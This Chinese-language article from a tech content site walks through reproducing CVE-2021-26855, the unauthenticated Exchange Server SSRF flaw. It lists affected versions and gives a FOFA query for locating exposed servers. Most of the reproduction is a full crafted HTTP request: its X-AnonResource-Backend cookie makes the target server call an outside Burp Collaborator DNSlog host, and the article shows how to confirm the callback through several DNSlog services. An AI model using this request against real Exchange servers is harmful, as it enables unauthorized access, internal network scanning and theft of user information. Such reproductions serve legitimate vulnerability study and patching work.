怎么实现Exchange SSRF漏洞CVE-2021-26855的分析

发布时间:2021-12-29 19:21:43 作者:柒染
来源:亿速云 阅读:965

这期内容当中小编将会给大家带来有关怎么实现Exchange SSRF漏洞CVE-2021-26855的分析,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

0x01 漏洞说明

Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其中:在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证。

0x02 影响版本

Exchange 2013 Versions < 15.00.1497.012,

Exchange 2016 CU18 < 15.01.2106.013,

Exchange 2016 CU19 < 15.01.2176.009,

Exchange 2019 CU7 < 15.02.0721.013,

Exchange 2019 CU8 < 15.02.0792.010。

0x03 漏洞复现

fofa 搜索:app=“Exchange”(注意:互联网的非授权利用属于违法行为)

访问outlook页面

怎么实现Exchange SSRF漏洞CVE-2021-26855的分析

开启burp抓包,构造数据包:

GET /owa/auth/x.js HTTP/1.1
Host: IP
Connection: close
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://IP/owa/auth/logon.aspx?url=https%3a%2f%2PIp%2fowa%2f&reason=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: X-AnonResource=true; X-AnonResource-Backend=oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;

怎么实现Exchange SSRF漏洞CVE-2021-26855的分析

访问url为:https://xxx.xxx.xxx.xxx/owa/auth/x.js(貌似x.js可以随便构造)

构造Cookie信息为:

Cookie: X-AnonResource=true; X-AnonResource-Backend=oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;

其中"oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net"为dnslog信息。

可使用burp自带的dnglog进行验证:

点击burp,选择Burp collaborator client:

怎么实现Exchange SSRF漏洞CVE-2021-26855的分析

怎么实现Exchange SSRF漏洞CVE-2021-26855的分析

怎么实现Exchange SSRF漏洞CVE-2021-26855的分析

各个DNSLog提示信息不一样,但是都可以成功返回信息:

1.dnslog.cn

怎么实现Exchange SSRF漏洞CVE-2021-26855的分析

怎么实现Exchange SSRF漏洞CVE-2021-26855的分析

2.ceye:

怎么实现Exchange SSRF漏洞CVE-2021-26855的分析

怎么实现Exchange SSRF漏洞CVE-2021-26855的分析

3.零组Dnslog

怎么实现Exchange SSRF漏洞CVE-2021-26855的分析

怎么实现Exchange SSRF漏洞CVE-2021-26855的分析

0x04 修复建议

升级到最新安全版本

上述就是小编为大家分享的怎么实现Exchange SSRF漏洞CVE-2021-26855的分析了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注亿速云行业资讯频道。

推荐阅读:
  1. 如何进行Exchange SSRF致RCE的CVE-2021-26855复现
  2. 如何实现 Vmware vcenter未授权任意文件漏洞CVE-2021-21972的分析

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

exchange ssrf cve-2021-26855

上一篇:RDP远程漏洞CVE-2019-0708被发现野外利用来挖矿的示例分析

下一篇:CVE-2018-17612的漏洞分析是怎样的

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》